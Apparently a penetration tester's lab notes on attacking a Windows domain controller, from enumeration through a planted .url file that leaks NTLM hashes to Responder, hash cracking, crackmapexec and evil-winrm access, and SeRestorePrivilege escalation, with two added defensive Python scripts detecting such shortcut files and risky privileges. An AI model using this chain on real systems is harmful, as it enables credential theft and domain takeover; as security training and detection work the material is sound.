Useful things for attacking Windows systems.
If RDP is available, Nmap can glean some super useful information with its rdp-ntlm-info NSE script.
kali@kali:~$ nmap -p 3389 --script=rdp-ntlm-info target
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 14:10 MST
Nmap scan report for target (target)
Host is up (0.068s latency).
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-ntlm-info:
|   Target_Name: TARGET
|   NetBIOS_Domain_Name: TARGET
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: TARGET.local
|   DNS_Computer_Name: DC.target.local
|   DNS_Tree_Name: target.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-12-15T21:10:22+00:00
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
If NetBIOS and/or SMB is enabled, enum4linux is your friend. It may even be able to enumerate local users for you.
nbtscan is also useful for learning the server’s hostname.
Smbclient can be used to list and connect to SMB shares.
kali@kali:~$ smbclient -L target
Password for [WORKGROUP\kali]:
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DocumentsShare  Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to target failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
kali@kali:~/proving_grounds/vault$ smbclient \\\\target\\DocumentsShare
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Dec 15 13:06:46 2024
  ..                                  D        0  Sun Dec 15 13:06:46 2024
  test.url                            A      107  Sun Dec 15 13:06:46 2024

		7706623 blocks of size 4096. 1121842 blocks available
You may notice test.url in the directory listing. I created that. It’s a malicious link file. It adds a shortcut icon in the given directory. If the user views this directory, you can capture their NTLM hash with responder.
Contents of the file are as follows:
[InternetShortcut]
URL=meow
WorkingDirectory=fuckyou
IconFile=\\me\%USERNAME%.icon
IconIndex=1
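For the defensive side of the same trick, here is an added example in Python (not part of the original notes): it parses .url shortcut files with configparser and flags any IconFile, URL or WorkingDirectory value that points at a UNC path or a file:// host, which is what makes Explorer authenticate outward when the folder is rendered. The two sample files and the 192.0.2.10 host are constructed for the example, and the scan_tree helper assumes the share being checked is mounted locally.

```python
from __future__ import annotations

import configparser
import re
import tempfile
from pathlib import Path

# A value Explorer would resolve over the network: a UNC path (\\host\share\...)
# or a file:// URL that names a remote host. file:///C:/... stays unflagged.
REMOTE_RE = re.compile(r"^(\\\\[^\\]+\\|file://[^/]+/)", re.IGNORECASE)

# [InternetShortcut] keys Explorer resolves when it renders the folder; an
# off-host IconFile is what triggers the outbound NTLM authentication.
RESOLVED_KEYS = ("IconFile", "URL", "WorkingDirectory")

# Constructed samples (not the page's own test.url): one points its icon at a
# remote host, the other is an ordinary intranet shortcut with a local icon.
SUSPICIOUS_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=https://intranet.example.test/\n"
    "IconFile=\\\\192.0.2.10\\icons\\%USERNAME%.icon\n"
    "IconIndex=1\n"
)
BENIGN_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=https://intranet.example.test/\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\n"
    "IconIndex=3\n"
)


def parse_url_file(text: str) -> dict[str, str]:
    """Parse the INI-style body of a .url file into its [InternetShortcut] keys."""
    parser = configparser.ConfigParser(interpolation=None)  # keep %USERNAME% literal
    parser.optionxform = str  # preserve key case (IconFile, not iconfile)
    parser.read_string(text)
    if "InternetShortcut" not in parser:
        return {}
    return dict(parser["InternetShortcut"])


def find_remote_references(fields: dict[str, str]) -> list[tuple[str, str]]:
    """Return (key, value) pairs whose value would be fetched from another host."""
    hits = []
    for key in RESOLVED_KEYS:
        value = fields.get(key, "").strip()
        if value and REMOTE_RE.match(value):
            hits.append((key, value))
    return hits


def scan_tree(root: Path) -> dict[str, list[tuple[str, str]]]:
    """Walk a locally mounted share and report .url files with remote references."""
    findings: dict[str, list[tuple[str, str]]] = {}
    for path in sorted(root.rglob("*.url")):
        try:
            fields = parse_url_file(path.read_text(errors="replace"))
        except configparser.Error:
            # Not valid INI: Explorer will not render it as a shortcut either.
            continue
        hits = find_remote_references(fields)
        if hits:
            findings[path.name] = hits
    return findings


def demo() -> dict[str, list[tuple[str, str]]]:
    """Write the two constructed samples into a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp)
        (share / "readme.url").write_text(SUSPICIOUS_URL_FILE)
        (share / "intranet.url").write_text(BENIGN_URL_FILE)
        return scan_tree(share)


if __name__ == "__main__":
    for name, hits in demo().items():
        for key, value in hits:
            print(f"{name}: {key} -> {value}")
```

Run periodically over shares that many users browse; a hit is worth correlating with outbound SMB connection attempts from workstations that rendered the folder, and with the mitigations the notes imply for this whole class of capture (no outbound SMB to untrusted networks, SMB signing, no LLMNR/NBT-NS).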
Speaking of responder, it’s a great tool for just capturing things on a network.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
You can try to crack any captured hashes with hashcat’s -m 5600 option.
Once you have the username and password from that, you can use another great tool called crackmapexec to check which services those credentials can log in to. This is especially useful when attacking a domain.
kali@kali:~$ crackmapexec winrm -u username -p password -- target
SMB         target          5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:target.local)
HTTP        target          5985   DC               [*] http://target:5985/wsman
WINRM       target          5985   DC               [+] target.local\username:password (Pwn3d!)
Note the '--' after the password. It marks the end of the options; without it, the target is read as part of the password.
You can also specify CIDR blocks such as 192.168.1.0/24.
To use the stolen credentials, we turn to yet another tool called evil-winrm (evil-windows remote management).
kali@kali:~$ evil-winrm -i target -u username -p password
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents> whoami
target\username
Great, you have shell!
One of the first things to look for when you access a given system is what privileges you have on it. You can do so with the whoami /priv command.
*Evil-WinRM* PS C:\Users\username\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
Even though we're not an administrator, some of those privileges can be abused to gain administrator rights.
There are useful tools such as SeRestoreAbuse.exe (they are a pain in the ass to compile, because Windows) that you run with one argument, the file path of your reverse shell, to do this.
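As an added example, not code from the original notes, the following Python parses the whoami /priv output shown above and reports which enabled privileges fall into an admin-equivalent watchlist. The watchlist defaults to the two the notes single out, SeBackupPrivilege and SeRestorePrivilege (both let the holder read or write files regardless of their ACLs), and is the check a reviewer runs when auditing what a user or service account has actually been granted. The first sample is the session output above; the second, with SeRestorePrivilege reported as Disabled, is constructed.

```python
from __future__ import annotations

import re

# Privileges that let a holder bypass file ACLs; the notes above describe
# these as abusable for administrator rights. Extend the set to whatever your
# own review policy treats as admin-equivalent.
ADMIN_EQUIVALENT = {"SeBackupPrivilege", "SeRestorePrivilege"}

# One row of the `whoami /priv` table: name, free-text description, state.
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")

# The session output shown above, as the parser receives it.
SESSION_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
"""

# Constructed variant: the same account after SeRestorePrivilege has been
# taken out of its effective token (whoami reports it as Disabled).
HARDENED_OUTPUT = re.sub(
    r"^(SeRestorePrivilege .*)Enabled$", r"\1Disabled", SESSION_OUTPUT, flags=re.M
)


def parse_whoami_priv(output: str) -> dict[str, tuple[str, bool]]:
    """Map privilege name -> (description, enabled) from `whoami /priv` text."""
    privileges: dict[str, tuple[str, bool]] = {}
    for line in output.splitlines():
        match = PRIV_ROW.match(line.strip())
        if match:
            name, description, state = match.groups()
            privileges[name] = (description, state == "Enabled")
    return privileges


def flag_admin_equivalent(
    privileges: dict[str, tuple[str, bool]], watchlist: set[str] = ADMIN_EQUIVALENT
) -> list[str]:
    """Return the enabled privileges that appear on the watchlist, sorted."""
    return sorted(
        name for name, (_, enabled) in privileges.items() if enabled and name in watchlist
    )


if __name__ == "__main__":
    for label, text in (("session", SESSION_OUTPUT), ("hardened", HARDENED_OUTPUT)):
        privs = parse_whoami_priv(text)
        print(f"{label}: {len(privs)} privileges, "
              f"admin-equivalent enabled: {flag_admin_equivalent(privs)}")
```

Feed it the output of `whoami /priv` from each account a reviewer cares about (or the output of `Get-...` equivalents piped through the same format); any non-admin account that comes back with a non-empty list is one whose rights assignment should be justified or removed.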